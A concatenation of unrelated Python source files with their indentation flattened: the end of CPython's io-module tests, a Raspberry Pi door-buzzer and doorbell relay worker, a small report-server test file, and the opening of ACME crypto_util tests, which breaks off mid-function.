def test_illegal_decoder(self):
# Issue #17106
# Crash when decoder returns non-string
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
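# b'\xe8\xa2\x88' is the UTF-8 encoding of U+8888; feeding it one byte at a
# time verifies that the decoder buffers incomplete multi-byte sequences and
# that getstate()/setstate() round-trips that buffered state.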
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
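# iter(callable, sentinel): keep calling rf.read() until it returns None,
# i.e. until the non-blocking read finds no more buffered data.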
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
worker.py
|
import time
import logging
from functools import wraps
from multiprocessing import Queue
from threading import Thread
LOG = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except (ImportError, RuntimeError):
    LOG.warning("Not running on Raspberry Pi; controls unavailable")
def async(function):
@wraps(function)
def wrapper(*args, **kwargs):
t = Thread(target=function, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
return wrapper
class BaseWorker(Thread):
"""
Worker thread that interfaces with relays.
The only safe method to call from another thread is :meth:`~.do`.
Parameters
----------
calendar : :class:`stiny.gutil.Calendar`
Stiny wrapper for Google Calendar API
in_map : dict, optional
Mapping for names of input relays to the relay index
out_map : dict, optional
Mapping for names of output relays to the relay index
isolate : bool, optional
If True, don't attempt to send signals to the relays. Useful for local
development (default False)
input_throttle : float, optional
Minimum number of seconds between reads of the same input (default 0.1)
"""
def __init__(self, *args, **kwargs):
self.cal = kwargs.pop('calendar')
self._isolate = kwargs.pop('isolate', False)
self._in_map = kwargs.pop('in_map', {})
self._out_map = kwargs.pop('out_map', {})
self._input_throttle = kwargs.pop('input_throttle', 0.1)
super(BaseWorker, self).__init__(*args, **kwargs)
self._msg_queue = Queue()
self._state = {key: False for key in self._out_map}
self._last_read_time = {}
self._btn_states = {}
def setup(self):
""" Initialize the relays. """
if self._isolate:
return
GPIO.setmode(GPIO.BCM)
for idx in self._out_map.values():
GPIO.setup(idx, GPIO.OUT)
for idx in self._in_map.values():
GPIO.setup(idx, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def _write(self, relay, on):
""" Write a state to a relay. """
if self._isolate:
return False
GPIO.output(self._out_map[relay], 1 if on else 0)
def _get(self, relay):
"""
Get on/off state from an input.
Returns
-------
on : bool
"""
if self._isolate:
return False
return not GPIO.input(self._in_map[relay])
def _get_input(self, relay):
"""
Get throttled state of input.
Returns
-------
changed : bool
True if the state is different from last call.
on : bool
"""
now = time.time()
# Sometimes the input switches jitter, so throttle the changes.
if self._last_read_time.get(relay, 0) + self._input_throttle > now:
return False, None
self._last_read_time[relay] = now
state = self._get(relay)
changed = state != self._btn_states.setdefault(relay, False)
self._btn_states[relay] = state
return changed, state
def _listen_for_inputs(self):
""" Check all inputs and queue commands if activated. """
for name in self._in_map:
changed, state = self._get_input(name)
if changed:
self.trigger_input(name, state)
def get_inputs(self):
return self._in_map.keys()
def trigger_input(self, name, state):
"""
Trigger one of the inputs
Parameters
----------
name : str
Name of the input to trigger
state : bool
On/off state of the input
"""
method_name = 'on_%s' % name
LOG.debug("Received input %s", method_name)
meth = getattr(self, method_name, None)
if meth is None:
LOG.warning("Unhandled input %r", method_name)
return
try:
meth(state)
except TypeError:
LOG.exception("Bad arguments")
def _process_messages(self):
""" Process all messages in the queue. """
requeue = []
while not self._msg_queue.empty():
msg = self._msg_queue.get()
# If the message has a start time, it might not be time to run it
# yet. Requeue it after processing other messages.
if 'run_after' in msg and time.time() < msg['run_after']:
requeue.append(msg)
continue
method_name = 'do_%s' % msg['command']
LOG.debug("Running %s, %s", method_name, msg['data'])
meth = getattr(self, method_name, None)
if meth is None:
LOG.error("Bad command %r", method_name)
continue
try:
meth(**msg['data'])
except TypeError:
LOG.exception("Bad arguments")
for msg in requeue:
self._msg_queue.put(msg)
def do_on(self, relay):
""" Turn a relay on. """
self._state[relay] = True
def do_off(self, relay):
""" Turn a relay off. """
self._state[relay] = False
def do_on_off(self, relay, duration):
"""
Turn a relay on, then off.
Parameters
----------
relay : str
Name of the relay.
duration : float
Number of seconds to keep relay on.
"""
self.do_on(relay)
self.do('off', delay=duration, relay=relay)
def do(self, command, delay=None, run_after=None, **kwargs):
"""
Thread-safe way to enqueue a message.
Parameters
----------
command : str
Name of command. Will run the method "do_[command]".
delay : float, optional
Wait for this many seconds, then run the command.
run_after : float, optional
Unix timestamp. Will wait until this time before running the
command.
**kwargs : dict, optional
Pass these arguments to the method being run.
"""
if delay is not None and run_after is not None:
raise TypeError("Cannot specify 'delay' and 'run_after'")
msg = {
'command': command,
'data': kwargs,
}
if delay is not None:
msg['run_after'] = time.time() + delay
elif run_after is not None:
msg['run_after'] = run_after
self._msg_queue.put(msg)
def run(self):
self.setup()
while True:
self._listen_for_inputs()
self._process_messages()
if not self._isolate:
for relay, on in self._state.iteritems():
self._write(relay, on)
time.sleep(0.01)
class DoorWorker(BaseWorker):
""" Worker for the door buzzer and doorbell relays. """
def __init__(self, *args, **kwargs):
kwargs.setdefault('out_map', {
'doorbell': 7,
'outside_latch': 4,
})
kwargs.setdefault('in_map', {
'doorbell_button': 22,
'buzzer': 23,
})
super(DoorWorker, self).__init__(*args, **kwargs)
self.party_delay = 4
def on_doorbell_button(self, state):
"""
Ring doorbell when doorbell is pressed.
If in party mode, also open the door.
"""
self.do('on' if state else 'off', relay='doorbell')
if not state:
self._open_if_party()
@async
def _open_if_party(self):
now = time.time()
if self.cal.is_party_time():
# Factor out the network request time from the delay
delta = time.time() - now
delay = max(0, self.party_delay - delta)
LOG.debug("PARTY TIME (delay %.02f)", delay)
self.do('on_off', delay=delay, duration=3,
relay='outside_latch')
else:
LOG.debug("No party")
def on_buzzer(self, state):
""" Open the door when buzzer is pressed """
self.do('on' if state else 'off', relay='outside_latch')
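# --- Hedged usage sketch (not part of the original module) -----------------
# Demonstrates the thread-safe message-queue protocol in isolated mode, i.e.
# without touching GPIO. DummyCalendar is a hypothetical stand-in for the
# stiny.gutil.Calendar wrapper that BaseWorker normally receives.
if __name__ == '__main__':
    class DummyCalendar(object):
        def is_party_time(self):
            return False

    worker = DoorWorker(calendar=DummyCalendar(), isolate=True)
    worker.daemon = True
    worker.start()
    # Enqueue a command: turn the doorbell relay on, then off after 3 seconds.
    worker.do('on_off', relay='doorbell', duration=3)
    time.sleep(5)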
|
test_report_server.py
|
# -*- coding: utf-8 -*-
"""Module unittests.test_report_server.py
This module contains methods to test the report_server module via pytest.
"""
import os
import time
import signal
from multiprocessing import Process
from compliance_suite.report_server import capitalize, ReportServer
from unittests.constants import OUTPUT_DIR
# TODO: re-enable test once I've figured out how to get it working on travis ci
# def spawn_report_server():
# """spawn a sample report server as a subprocess"""
# rs = ReportServer(OUTPUT_DIR)
# rs.set_free_port()
# rs.serve_thread()
def test_capitalize():
"""asserts capitalize function works as expected"""
word = "word"
assert capitalize(word) == "Word"
# TODO: re-enable test once I've figured out how to get it working on travis ci
# def test_keyboard_interrupt():
# """asserts keyboard interrupts are caught and lead to program shutdown"""
#
# # start a server, send a keyboard interrupt to the process, then check
# # that the process is no longer alive and exited without error (code 0)
# def subprocess():
# rs = ReportServer(OUTPUT_DIR)
# rs.set_free_port()
# rs.serve_thread(uptime=10)
#
# if not os.path.exists(OUTPUT_DIR):
# os.mkdir(OUTPUT_DIR)
#
# p = Process(target=subprocess)
# p.start()
# time.sleep(2)
# os.kill(p.pid, signal.SIGINT)
# time.sleep(2)
# assert p.is_alive() == False
# assert p.exitcode == 0
#
# os.rmdir(OUTPUT_DIR)
|
crypto_util_test.py
|
"""Tests for acme.crypto_util."""
import itertools
import socket
import threading
import time
import unittest
import six
from six.moves import socketserver #type: ignore # pylint: disable=import-error
import OpenSSL
from acme import errors
from acme import jose
from acme import test_util
class SSLSocketAndProbeSNITest(unittest.TestCase):
"""Tests for acme.crypto_util.SSLSocket/probe_sni."""
_multiprocess_can_split_ = True
def setUp(self):
self.cert = test_util.load_comparable_cert('rsa2048_cert.pem')
key = test_util.load_pyopenssl_private_key('rsa2048_key.pem')
# pylint: disable=protected-access
certs = {b'foo': (key, self.cert.wrapped)}
from acme.crypto_util import SSLSocket
class _TestServer(socketserver.TCPServer):
# pylint: disable=too-few-public-methods
# six.moves.* | pylint: disable=attribute-defined-outside-init,no-init
def server_bind(self): # pylint: disable=missing-docstring
self.socket = SSLSocket(socket.socket(), certs=certs)
socketserver.TCPServer.server_bind(self)
self.server = _TestServer(('', 0), socketserver.BaseRequestHandler)
self.port = self.server.socket.getsockname()[1]
self.server_thread = threading.Thread(
# pylint: disable=no-member
target=self.server.handle_request)
self.server_thread.start()
time.sleep(1) # TODO: avoid race conditions in other way
def tearDown(self):
self.server_thread.join()
def _probe(self, name):
from acme.crypto_util import probe_sni
return jose.ComparableX509(probe_sni(
name, host='127.0.0.1', port=self.port))
def test_probe_ok(self):
self.assertEqual(self.cert, self._probe(b'foo'))
def test_probe_not_recognized_name(self):
self.assertRaises(errors.Error, self._probe, b'bar')
# TODO: py33/py34 tox hangs forever on do_handshake in second probe
#def probe_connection_error(self):
# self._probe(b'foo')
# #time.sleep(1) # TODO: avoid race conditions in other way
# self.assertRaises(errors.Error, self._probe, b'bar')
class PyOpenSSLCertOrReqSANTest(unittest.TestCase):
"""Test for acme.crypto_util._pyopenssl_cert_or_req_san."""
_multiprocess_can_split_ = True
@classmethod
def _call(cls, loader, name):
# pylint: disable=protected-access
from acme.crypto_util import _pyopenssl_cert_or_req_san
return _pyopenssl_cert_or_req_san(loader(name))
@classmethod
def _get_idn_names(cls):
"""Returns expected names from '{cert,csr}-idnsans.pem'."""
chars = [six.unichr(i) for i in itertools.chain(range(0x3c3, 0x400),
range(0x641, 0x6fc),
range(0x1820, 0x1877))]
return [''.join(chars[i: i + 45]) + '.invalid'
for i in range(0, len(chars), 45)]
def _call_cert(self, name):
return self._call(test_util.load_cert, name)
def _call_csr(self, name):
return self._call(test_util.load_csr, name)
def test_cert_no_sans(self):
self.assertEqual(self._call_cert('cert.pem'), [])
def test_cert_two_sans(self):
self.assertEqual(self._call_cert('cert-san.pem'),
['example.com', 'www.example.com'])
def test_cert_hundred_sans(self):
self.assertEqual(self._call_cert('cert-100sans.pem'),
['example{0}.com'.format(i) for i in range(1, 101)])
def test_cert_idn_sans(self):
self.assertEqual(self._call_cert('cert-idnsans.pem'),
self._get_idn_names())
def test_csr_no_sans(self):
self.assertEqual(self._call_csr('csr-nosans.pem'), [])
def test_csr_one_san(self):
self.assertEqual(self._call_csr('csr.pem'), ['example.com'])
def test_csr_two_sans(self):
self.assertEqual(self._call_csr('csr-san.pem'),
['example.com', 'www.example.com'])
def test_csr_six_sans(self):
self.assertEqual(self._call_csr('csr-6sans.pem'),
['example.com', 'example.org', 'example.net',
'example.info', 'subdomain.example.com',
'other.subdomain.example.com'])
def test_csr_hundred_sans(self):
self.assertEqual(self._call_csr('csr-100sans.pem'),
['example{0}.com'.format(i) for i in range(1, 101)])
def test_csr_idn_sans(self):
self.assertEqual(self._call_csr('csr-idnsans.pem'),
self._get_idn_names())
def test_critical_san(self):
self.assertEqual(self._call_cert('critical-san.pem'),
['chicago-cubs.venafi.example', 'cubs.venafi.example'])
class RandomSnTest(unittest.TestCase):
"""Test for random certificate serial numbers."""
_multiprocess_can_split_ = True
def setUp(self):
self.cert_count = 5
self.serial_num = []
self.key = OpenSSL.crypto.PKey()
self.key.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
def test_sn_collisions(self):
from acme.crypto_util import gen_ss_cert
for _ in range(self.cert_count):
